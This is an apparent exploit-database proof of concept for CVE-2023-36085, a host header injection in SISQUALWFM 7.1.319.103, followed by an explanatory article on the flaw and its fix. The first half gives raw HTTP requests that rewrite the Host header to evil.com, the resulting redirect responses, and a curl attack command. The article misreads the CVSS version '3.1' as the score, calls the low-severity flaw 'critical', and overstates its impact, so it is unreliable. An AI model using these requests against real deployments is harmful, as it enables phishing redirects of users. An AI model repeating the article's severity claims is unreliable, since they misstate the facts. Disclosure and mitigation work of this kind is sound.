SISQUALWFM 7.1.319.103 - Host Header Injection
# Exploit Title: SISQUALWFM 7.1.319.103 Host Header Injection
# Discovered Date: 17/03/2023
# Reported Date: 17/03/2023
# Resolved Date: 13/10/2023
# Exploit Author: Omer Shaik (unknown_exploit)
# Vendor Homepage: https://www.sisqualwfm.com
# Version: 7.1.319.103
# Tested on: SISQUAL WFM 7.1.319.103
# Affected Version: sisqualWFM - 7.1.319.103
# Fixed Version: sisqualWFM - 7.1.319.111
# CVE : CVE-2023-36085
# CVSS: 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
# Category: Web Apps
A proof-of-concept(POC) scenario that demonstrates a potential host header injection vulnerability in sisqualWFM version 7.1.319.103, specifically targeting the /sisqualIdentityServer/core endpoint. This vulnerability could be exploited by an attacker to manipulate webpage links or redirect users to another site with ease, simply by tampering with the host header.
****************************************************************************************************
Orignal Request
****************************************************************************************************
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie:<cookie>
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
****************************************************************************************************
Orignal Response
****************************************************************************************************
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Date: Wed, 22 Mar 2023 13:22:10 GMT
Content-Length: 0
****************************************************************************************************
██████╗ ██████╗ ██████╗
██╔══██╗██╔═══██╗██╔════╝
██████╔╝██║ ██║██║
██╔═══╝ ██║ ██║██║
██║ ╚██████╔╝╚██████╗
╚═╝ ╚═════╝ ╚═════╝
****************************************************************************************************
Request has been modified to redirect user to evil.com (Intercepted request using Burp proxy)
****************************************************************************************************
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie:<cookie>
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
****************************************************************************************************
Response
****************************************************************************************************
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Length: 0
****************************************************************************************************
Method of Attack
****************************************************************************************************
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv
****************************************************************************************************Understanding Host Header Injection in SISQUALWFM 7.1.319.103: A Critical Web Security Vulnerability
Host header injection is a subtle yet potent web application vulnerability that can lead to severe security consequences, including unauthorized redirection, session hijacking, and even server-side request forgery (SSRF). In March 2023, a critical flaw was identified in SISQUALWFM 7.1.319.103, a widely used enterprise workflow management platform. This vulnerability, formally recognized as CVE-2023-36085, highlights how improper handling of the Host header can compromise application integrity and user trust.
What Is Host Header Injection?
HTTP requests include a Host header that specifies the domain name of the server being accessed. While this header is typically trusted by servers, some applications fail to validate or sanitize it properly. When this happens, attackers can manipulate the Host value to redirect the server’s internal logic to unintended domains.
For example, if a server uses the Host header to generate URLs for redirects, authentication, or session management, an attacker can craft a malicious Host value to force the application to redirect users to a phishing site or a malicious backend server.
The SISQUALWFM 7.1.319.103 Vulnerability in Action
Consider the following scenario involving the /sisqualIdentityServer/core/login endpoint:
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: session=abc123
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
This original request is legitimate and directed to sisqualwfm.cloud. The server responds with a 302 Found redirect:
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Date: Wed, 22 Mar 2023 13:22:10 GMT
Content-Length: 0
The Location header is generated based on the Host value, indicating that the server dynamically constructs redirect URLs using the incoming Host header.
Exploiting the Vulnerability: Redirecting to Evil.com
An attacker can intercept the request using a proxy like Burp Suite and modify the Host header to evil.com:
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: session=abc123
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Now, the server responds with:
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Date: Wed, 22 Mar 2023 13:22:10 GMT
Content-Length: 0
Users are redirected to https://evil.com—a malicious domain controlled by the attacker. This is not just a simple redirect; it can be leveraged for:
- Phishing attacks: Fake login pages mimicking the original SISQUALWFM interface.
- Session hijacking: If the application uses the
Hostheader to validate session tokens, the attacker can bypass authentication. - SSRF (Server-Side Request Forgery): If internal services use the
Hostheader to determine target endpoints, attackers can force internal requests to external malicious servers.
Security Impact and CVSS Analysis
The vulnerability was assigned a CVSS score of 3.1 with the following metrics:
| Vector | Value |
|---|---|
| AV | N (Network) |
| AC | L (Low) |
| PR | N (None) |
| UI | R (Required) |
| S | C (Changed) |
| C | L (Low) |
| I | L (Low) |
| A | N (None) |
This indicates a low complexity attack requiring user interaction (e.g., visiting a malicious link), but with significant impact due to potential data leakage and session manipulation. The S:C (Changed) score reflects that the vulnerability alters the application’s behavior in a way that can compromise security policies.
How to Prevent Host Header Injection
Developers and security teams must implement strict validation and sanitization of the Host header. The following best practices should be enforced:
- Whitelist Host headers: Only accept requests from known, trusted domains (e.g.,
sisqualwfm.cloud). - Validate against configured domains: Use server configuration to define allowed hosts, and reject any mismatch.
- Do not use Host header for URL generation: Always construct URLs using internal configuration or hardcoded values, not user-provided headers.
- Log suspicious Host values: Monitor for unexpected or malformed
Hostheaders in logs for early detection.
For example, in a secure application, the redirect logic should be:
// Instead of:
redirectUrl = "https://" + request.headers["Host"] + "/login"
// Use:
redirectUrl = "https://sisqualwfm.cloud/login"
This ensures that the redirect target is hardcoded and cannot be influenced by malicious input.
Resolution and Patch Update
The vulnerability was resolved in SISQUALWFM 7.1.319.111, released on October 13, 2023. The patch included:
- Host header validation logic
- Strict domain whitelisting
- Enhanced logging for malformed headers
Organizations using the affected version (7.1.319.103) are strongly advised to upgrade immediately to prevent exploitation.
Real-World Implications and Lessons Learned
Host header injection is often overlooked because it appears benign. However, as demonstrated in this case, it can be a gateway to full compromise of web applications. This vulnerability underscores the importance of:
- Defense in depth: Never trust client-provided headers without validation.
- Secure coding practices: Treat all input as potentially malicious, even if it seems harmless.
- Regular security audits: Automated tools and manual testing should include header validation checks.
Even a single misconfigured header can lead to a chain of attacks, especially in enterprise systems where user trust and data integrity are paramount.
Security professionals must remain vigilant. As new versions of SISQUALWFM are released, they should verify that host header handling remains secure—because the next vulnerability might be just one header away.